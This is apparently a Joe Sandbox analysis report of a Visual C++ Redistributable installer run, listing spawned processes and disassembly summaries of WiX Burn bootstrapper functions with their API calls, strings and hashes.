Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	14:42:01
Start date:	02/01/2025
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff7168b0000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	14:42:10
Start date:	02/01/2025
Path:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe" /burn.runonce
Imagebase:	0x710000
File size:	647'912 bytes
MD5 hash:	2F9D2B6CE54F9095695B53D1AA217C7B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	14:42:10
Start date:	02/01/2025
Path:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe"
Imagebase:	0x710000
File size:	647'912 bytes
MD5 hash:	2F9D2B6CE54F9095695B53D1AA217C7B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	14:42:10
Start date:	02/01/2025
Path:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe" -burn.clean.room="C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe" -burn.filehandle.attached=532 -burn.filehandle.self=540
Imagebase:	0x710000
File size:	647'912 bytes
MD5 hash:	2F9D2B6CE54F9095695B53D1AA217C7B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	14:43:42
Start date:	02/01/2025
Path:	C:\Windows\splwow64.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\splwow64.exe 12288
Imagebase:	0x7ff690880000
File size:	163'840 bytes
MD5 hash:	77DE7761B037061C7C112FD3C5B91E73
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 007C508D Relevance: 44.1, APIs: 5, Strings: 20, Instructions: 322
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 007C510F

Part of subcall function 008003F0: InitializeCriticalSection.KERNEL32(0082B60C,?,007C511B,00000000,?,?,?,?,?,?), ref: 00800407

Part of subcall function 007C1209: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,007C5137,00000000,?), ref: 007C1247
Part of subcall function 007C1209: GetLastError.KERNEL32(?,?,?,007C5137,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 007C1251

CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 007C517D

Part of subcall function 00800CD1: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00800CF2

GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 007C520F
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 007C5219
CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 007C549B

Strings

Failed to initialize XML util., xrefs: 007C51F1
Failed to get OS info., xrefs: 007C5247
Failed to initialize user state., xrefs: 007C5164
_Failed, xrefs: 007C53F7
Failed to run per-machine mode., xrefs: 007C5364
Invalid run mode., xrefs: 007C52F1
Failed to parse command line., xrefs: 007C513D
Failed to initialize COM., xrefs: 007C5189
Failed to run RunOnce mode., xrefs: 007C5314
Failed to run embedded mode., xrefs: 007C533C
3.10.4.4718, xrefs: 007C527C
Setup, xrefs: 007C53FC
user.cpp, xrefs: 007C523D
txt, xrefs: 007C53F2
Failed to initialize Wiutil., xrefs: 007C51D9
Failed to run per-user mode., xrefs: 007C538C
Failed to initialize core., xrefs: 007C52BB
Failed to initialize Regutil., xrefs: 007C51C1
Failed to initialize Cryputil., xrefs: 007C519E
Failed to run untrusted mode., xrefs: 007C53AE

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
String ID: 3.10.4.4718$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize user state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$Setup$_Failed$user.cpp$txt
API String ID: 3262001429-867073019
Opcode ID: 9fcbe324f2f8ee9899f73b9882a5f1a819220c790d0e255461b9dd4d16358479
Instruction ID: bdf25e1b5815f6363aab74c0ce79dd68721469f89393da3981bac9b7b1d91607
Opcode Fuzzy Hash: 9fcbe324f2f8ee9899f73b9882a5f1a819220c790d0e255461b9dd4d16358479
Instruction Fuzzy Hash: 16B1A471D41A699BDB729B648C4AFE977A4FF04310F04019DF908E6381D77AAEC08F91

Function 00802F23 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 152
libraryloadercomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,008034DF,00000000,?,00000000), ref: 00802F3D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,007EBDED,?,007C52FD,?,00000000,?), ref: 00802F49
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00802F89
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00802F95
GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 00802FA0
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00802FAA
CoCreateInstance.OLE32(0082B6C8,00000000,00000001,0080B808,?,?,?,?,?,?,?,?,?,?,?,007EBDED), ref: 00802FE5
ExitProcess.KERNEL32 ref: 00803094

Strings

kernel32.dll, xrefs: 00802F2D
xmlutil.cpp, xrefs: 00802F6D
Wow64DisableWow64FsRedirection, xrefs: 00802F8F
Wow64RevertWow64FsRedirection, xrefs: 00802FA2
Wow64EnableWow64FsRedirection, xrefs: 00802F97
IsWow64Process, xrefs: 00802F83

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
API String ID: 2124981135-499589564
Opcode ID: 15fd62bc666c9eb4ad2d8c0993edc72ce4c81e47fcf87f262bde66c714f147bc
Instruction ID: 2c57a7d63b1852bdb5cccbd1e9e9f44aeb9c47acfd843feba2543bffbab1c1f2
Opcode Fuzzy Hash: 15fd62bc666c9eb4ad2d8c0993edc72ce4c81e47fcf87f262bde66c714f147bc
Instruction Fuzzy Hash: B641A031A02726ABDB60DFA89C48F6EB7E8FF44750F114169E905E7390DB75DE408B90

Function 007C1070 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 77fileCOMMON

Download Yara Rule

APIs

Part of subcall function 007C33D7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,007C10DD,?,00000000), ref: 007C33F8

CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 007C10F6

Part of subcall function 007C1174: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,007C111A,cabinet.dll,00000009,?,?,00000000), ref: 007C1185
Part of subcall function 007C1174: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,007C111A,cabinet.dll,00000009,?,?,00000000), ref: 007C1190
Part of subcall function 007C1174: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 007C119E
Part of subcall function 007C1174: GetLastError.KERNEL32(?,?,?,?,007C111A,cabinet.dll,00000009,?,?,00000000), ref: 007C11B9
Part of subcall function 007C1174: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 007C11C1
Part of subcall function 007C1174: GetLastError.KERNEL32(?,?,?,?,007C111A,cabinet.dll,00000009,?,?,00000000), ref: 007C11D6

CloseHandle.KERNEL32(?,?,?,?,0080B4C0,?,cabinet.dll,00000009,?,?,00000000), ref: 007C1131

Strings

comres.dll, xrefs: 007C10B5
msasn1.dll, xrefs: 007C10C3
feclient.dll, xrefs: 007C10D1
msi.dll, xrefs: 007C10A0
crypt32.dll, xrefs: 007C10CA
clbcatq.dll, xrefs: 007C10BC
cabinet.dll, xrefs: 007C1099
version.dll, xrefs: 007C10A7
wininet.dll, xrefs: 007C10AE

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
API String ID: 3687706282-3151496603
Opcode ID: cf64ccb8bf7d0898a9b4d1ba426411a9ed30552f83d72016be4fb2f34275b53e
Instruction ID: 409e816813685e3fcbe146f7d2de88eb9123eb11892d08f53202b3607cd7781a
Opcode Fuzzy Hash: cf64ccb8bf7d0898a9b4d1ba426411a9ed30552f83d72016be4fb2f34275b53e
Instruction Fuzzy Hash: 86215C7190060CABDB509FA58C49FEEBBB8FF05720F50412DEA10F6292D7749A48CBA4

Function 007D9EB7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 51COMMON

Download Yara Rule

Strings

=S|, xrefs: 007D9EB7
Failed to copy working folder., xrefs: 007D9F12
Failed to calculate working folder to ensure it exists., xrefs: 007D9ED4
Failed create working folder., xrefs: 007D9EEA

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CurrentDirectoryErrorLastProcessWindows
String ID: =S|$Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
API String ID: 3841436932-3097034066
Opcode ID: c175b8bb2886893f3686cff9ba9adef6a8b095661b9141a4a5b27f1db0c15ebe
Instruction ID: e2a1f02be815fc9dd0b6387265c4176c43453e4f38b48d455828a94fb29586fd
Opcode Fuzzy Hash: c175b8bb2886893f3686cff9ba9adef6a8b095661b9141a4a5b27f1db0c15ebe
Instruction Fuzzy Hash: F3017132D04628F78B22AB55DC06CAF7B79EF90720B11415AFA04F6311EB798E50A6A0

Function 007C38D4 Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,000001C7,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38E5
RtlAllocateHeap.NTDLL(00000000,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38EC

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: b7fefaa0d1c2f97d13232ef70830bde8ac00b4c483e677ef30dc971077f67a02
Instruction ID: 6ce7ba16664e2fa7add9358d48aa38dad7b588570476fc7dc0e4b18b586879d6
Opcode Fuzzy Hash: b7fefaa0d1c2f97d13232ef70830bde8ac00b4c483e677ef30dc971077f67a02
Instruction Fuzzy Hash: 39C012331A0208EBCB406FF8EC0EC9A3BACBB286127008410B905C2210CB3CE0548B60

Function 007CDE25 Relevance: 126.6, APIs: 11, Strings: 61, Instructions: 646COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 007CDF4A
SysFreeString.OLEAUT32(00000000), ref: 007CE62A

Part of subcall function 007C38D4: GetProcessHeap.KERNEL32(?,000001C7,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38E5
Part of subcall function 007C38D4: RtlAllocateHeap.NTDLL(00000000,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38EC

Strings

InstallSize, xrefs: 007CE0F1
comres.dll, xrefs: 007CE126
feclient.dll, xrefs: 007CE18A
=S|, xrefs: 007CDE25
Failed to get @RollbackBoundaryBackward., xrefs: 007CE419
Failed to get package node count., xrefs: 007CDFA3
LogPathVariable, xrefs: 007CE168
Failed to get @InstallCondition., xrefs: 007CE3EB
CacheId, xrefs: 007CE0BB
Size, xrefs: 007CE0D6
Invalid cache type: %ls, xrefs: 007CE5DE
crypt32.dll, xrefs: 007CE1AD
ExePackage, xrefs: 007CE249
Failed to parse target product codes., xrefs: 007CE58F
Failed to get next node., xrefs: 007CE5FC
Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage, xrefs: 007CDF73
Failed to get @LogPathVariable., xrefs: 007CE3D7
MsuPackage, xrefs: 007CE2F8
RollbackLogPathVariable, xrefs: 007CE18B
Failed to get @Id., xrefs: 007CE5F5
Failed to get @CacheId., xrefs: 007CE5CF
always, xrefs: 007CE099
InstallCondition, xrefs: 007CE1AE
RollbackBoundaryForward, xrefs: 007CE1D1
msi.dll, xrefs: 007CE0BA
MsiPackage, xrefs: 007CE287
Failed to select rollback boundary nodes., xrefs: 007CDE5B
Failed to allocate memory for package structs., xrefs: 007CDFE1
Failed to get @PerMachine., xrefs: 007CE5BA
Failed to find forward transaction boundary: %ls, xrefs: 007CE3F8
Failed to parse EXE package., xrefs: 007CE27B
PerMachine, xrefs: 007CE10C
Failed to get @InstallSize., xrefs: 007CE5C1
Failed to allocate memory for MSP patch sequence information., xrefs: 007CE3CD
Failed to allocate memory for patch sequence information to package lookup., xrefs: 007CE464
Cache, xrefs: 007CE03D
Failed to get @Cache., xrefs: 007CE5EE
Failed to find backward transaction boundary: %ls, xrefs: 007CE40F
Failed to parse MSP package., xrefs: 007CE423
Vital, xrefs: 007CDF19, 007CE14D
Failed to select package nodes., xrefs: 007CDF86
Failed to allocate memory for rollback boundary structs., xrefs: 007CDEBC
Failed to get @RollbackLogPathVariable., xrefs: 007CE3E1
Failed to parse MSU package., xrefs: 007CE42D
Failed to get @Size., xrefs: 007CE5C8
clbcatq.dll, xrefs: 007CE10B
cabinet.dll, xrefs: 007CE0F0
Failed to get @RollbackBoundaryForward., xrefs: 007CE402
MspPackage, xrefs: 007CE2BF
Permanent, xrefs: 007CE127
package.cpp, xrefs: 007CDEB0, 007CDFD5, 007CE3C1, 007CE458
Failed to get rollback bundary node count., xrefs: 007CDE80
RollbackBoundary, xrefs: 007CDE48
Failed to parse dependency providers., xrefs: 007CE59E
Failed to get @Vital., xrefs: 007CE5AC
yes, xrefs: 007CE079
Failed to get @Permanent., xrefs: 007CE5B3
RollbackBoundaryBackward, xrefs: 007CE20B
wininet.dll, xrefs: 007CE14C
Failed to parse MSI package., xrefs: 007CE2B3
Failed to parse payload references., xrefs: 007CE5A5

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: FreeHeapString$AllocateProcess
String ID: =S|$Cache$CacheId$Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage$ExePackage$Failed to allocate memory for MSP patch sequence information.$Failed to allocate memory for package structs.$Failed to allocate memory for patch sequence information to package lookup.$Failed to allocate memory for rollback boundary structs.$Failed to find backward transaction boundary: %ls$Failed to find forward transaction boundary: %ls$Failed to get @Cache.$Failed to get @CacheId.$Failed to get @Id.$Failed to get @InstallCondition.$Failed to get @InstallSize.$Failed to get @LogPathVariable.$Failed to get @PerMachine.$Failed to get @Permanent.$Failed to get @RollbackBoundaryBackward.$Failed to get @RollbackBoundaryForward.$Failed to get @RollbackLogPathVariable.$Failed to get @Size.$Failed to get @Vital.$Failed to get next node.$Failed to get package node count.$Failed to get rollback bundary node count.$Failed to parse EXE package.$Failed to parse MSI package.$Failed to parse MSP package.$Failed to parse MSU package.$Failed to parse dependency providers.$Failed to parse payload references.$Failed to parse target product codes.$Failed to select package nodes.$Failed to select rollback boundary nodes.$InstallCondition$InstallSize$Invalid cache type: %ls$LogPathVariable$MsiPackage$MspPackage$MsuPackage$PerMachine$Permanent$RollbackBoundary$RollbackBoundaryBackward$RollbackBoundaryForward$RollbackLogPathVariable$Size$Vital$always$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msi.dll$package.cpp$wininet.dll$yes
API String ID: 336948655-4126215536
Opcode ID: d5dbede41c5af8cd455f8624adf95aff5ce47aab14b5e668415806919cf63a29
Instruction ID: dd6989e037a3a3cf0131c7e200211e8d0eac8f00274f8f5fdb9191174def9bc8
Opcode Fuzzy Hash: d5dbede41c5af8cd455f8624adf95aff5ce47aab14b5e668415806919cf63a29
Instruction Fuzzy Hash: 4B32A171900225ABCB219B54CC41FADBBB9FF04724F11426DF921FB291D7B8AE909F91

Function 007CF86E Relevance: 117.7, APIs: 3, Strings: 64, Instructions: 445
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

DisplayName, xrefs: 007CFA08
=S|, xrefs: 007CF86E
Classification, xrefs: 007CFD6C
Failed to get @Name., xrefs: 007CFD5E
registration.cpp, xrefs: 007CFC11
Failed to select Update node., xrefs: 007CFCC6
Failed to get @ExecutableName., xrefs: 007CF991
msasn1.dll, xrefs: 007CF8BF
Failed to parse software tag., xrefs: 007CFC9A
ProviderKey, xrefs: 007CF95D
Failed to get @DisplayName., xrefs: 007CFA1F
Update, xrefs: 007CFCA8
Failed to get @Tag., xrefs: 007CF8F4
Failed to get @Id., xrefs: 007CF8D3
Tag, xrefs: 007CF8E1
Register, xrefs: 007CF9E7
DisableRemove, xrefs: 007CFC53
Failed to set registration paths., xrefs: 007CFD92
DisableModify, xrefs: 007CFB80
Failed to parse @Version: %ls, xrefs: 007CF94F
Invalid modify disabled type: %ls, xrefs: 007CFC1E
HelpLink, xrefs: 007CFA77
Department, xrefs: 007CFD01
Failed to get @HelpLink., xrefs: 007CFA8E
DisplayVersion, xrefs: 007CFA2D
Failed to get @PerMachine., xrefs: 007CF9AF
ParentDisplayName, xrefs: 007CFB0B
Failed to get @HelpTelephone., xrefs: 007CFAB3
Failed to get @DisableModify., xrefs: 007CFC42
Publisher, xrefs: 007CFA52
Failed to select ARP node., xrefs: 007CF9D9
Failed to get @UpdateUrl., xrefs: 007CFAFD
Failed to select registration node., xrefs: 007CF8A6
Failed to get @DisableRemove., xrefs: 007CFC6A
PerMachine, xrefs: 007CF99C
Failed to get @Contact., xrefs: 007CFB72
HelpTelephone, xrefs: 007CFA9C
Arp, xrefs: 007CF9BD
Failed to get @ParentDisplayName., xrefs: 007CFB22
Failed to get @ProviderKey., xrefs: 007CF970
ProductFamily, xrefs: 007CFD26
Failed to get @DisplayVersion., xrefs: 007CFA44
Failed to get @Department., xrefs: 007CFD18
Failed to parse related bundles, xrefs: 007CF90D
clbcatq.dll, xrefs: 007CF8E0
Failed to get @AboutUrl., xrefs: 007CFAD8
Manufacturer, xrefs: 007CFCDD
button, xrefs: 007CFB9F
UpdateUrl, xrefs: 007CFAE6
Version, xrefs: 007CF91B
Failed to get @Manufacturer., xrefs: 007CFCF0
Failed to get @Version., xrefs: 007CF92E
Name, xrefs: 007CFD4B
Contact, xrefs: 007CFB5B
Failed to get @Classification., xrefs: 007CFD7F
Failed to get @Publisher., xrefs: 007CFA69
Registration, xrefs: 007CF888
ExecutableName, xrefs: 007CF97E
Failed to get @ProductFamily., xrefs: 007CFD3D
Failed to get @Register., xrefs: 007CF9FA
yes, xrefs: 007CFBC0
Failed to get @Comments., xrefs: 007CFB4A
AboutUrl, xrefs: 007CFAC1
Comments, xrefs: 007CFB33

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID:
String ID: =S|$AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$clbcatq.dll$msasn1.dll$registration.cpp$yes
API String ID: 0-647350706
Opcode ID: ba0e5cc234374768e483bcd3df2c6cc79e4b1211cc4298833778ca2047177bea
Instruction ID: f1642c79a54d07e79b12aa2864b9734b34000ca722f0b262773230d044ff8492
Opcode Fuzzy Hash: ba0e5cc234374768e483bcd3df2c6cc79e4b1211cc4298833778ca2047177bea
Instruction Fuzzy Hash: F3E1B332E40665BACF219AA4CC51FEDBB6AFF04720F11027DFD21F6390D7686E809685

Function 007CB389 Relevance: 93.3, APIs: 24, Strings: 29, Instructions: 565
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,00000000,7736C3F0,00000000), ref: 007CB3FF
SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 007CB44C
GetLastError.KERNEL32(?,?,?,00000000,7736C3F0,00000000), ref: 007CB452
ReadFile.KERNELBASE(00000000,\C|H,00000040,?,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 007CB49A
GetLastError.KERNEL32(?,?,?,00000000,7736C3F0,00000000), ref: 007CB4A0
SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 007CB4FD
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 007CB503
ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 007CB54C
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 007CB552
SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 007CB5C3
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 007CB5C9

Strings

Failed to get total size of bundle., xrefs: 007CB91F
PE Header from file didn't match PE Header in memory., xrefs: 007CBA0D
Failed to read image section header, index: %u, xrefs: 007CBAA8
Failed to open handle to user process path., xrefs: 007CB42A
(, xrefs: 007CB719
PE, xrefs: 007CB594
Failed to seek to NT header., xrefs: 007CB52E
Failed to read complete image section header, index: %u, xrefs: 007CBA71
Failed to read signature size., xrefs: 007CB692
Failed to allocate memory for container sizes., xrefs: 007CB9CF
Failed to read DOS header., xrefs: 007CB4CB
burn, xrefs: 007CB734
4, xrefs: 007CB780
Failed to find valid NT image header in buffer., xrefs: 007CBACC
Failed to seek to start of file., xrefs: 007CB47D
Failed to read signature offset., xrefs: 007CB643
Failed to seek to section info., xrefs: 007CB5F4, 007CB830
Failed to read section info, data to short: %u, xrefs: 007CB7A6
Failed to find Burn section., xrefs: 007CBA2E
Failed to read section info., xrefs: 007CB895
Failed to read section info, unsupported version: %08x, xrefs: 007CB8F1
\C|H, xrefs: 007CB3A0, 007CB494, 007CB4E7, 007CB3AD, 007CB497
Failed to read complete section info., xrefs: 007CB8C1
.wix, xrefs: 007CB72C
Failed to read NT header., xrefs: 007CB57D
Failed to seek past optional headers., xrefs: 007CB6E7
Failed to allocate buffer for section info., xrefs: 007CB7E0
section.cpp, xrefs: 007CB420, 007CB473, 007CB4C1, 007CB524, 007CB573, 007CB5EA, 007CB639, 007CB688, 007CB6DD, 007CB794, 007CB7D4, 007CB826, 007CB88B, 007CB8B5, 007CB8DC, 007CB9C3, 007CBA03, 007CBA22, 007CBA5F, 007CBA9D, 007CBAC0, 007CBADB
Failed to find valid DOS image header in buffer., xrefs: 007CBAE7

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
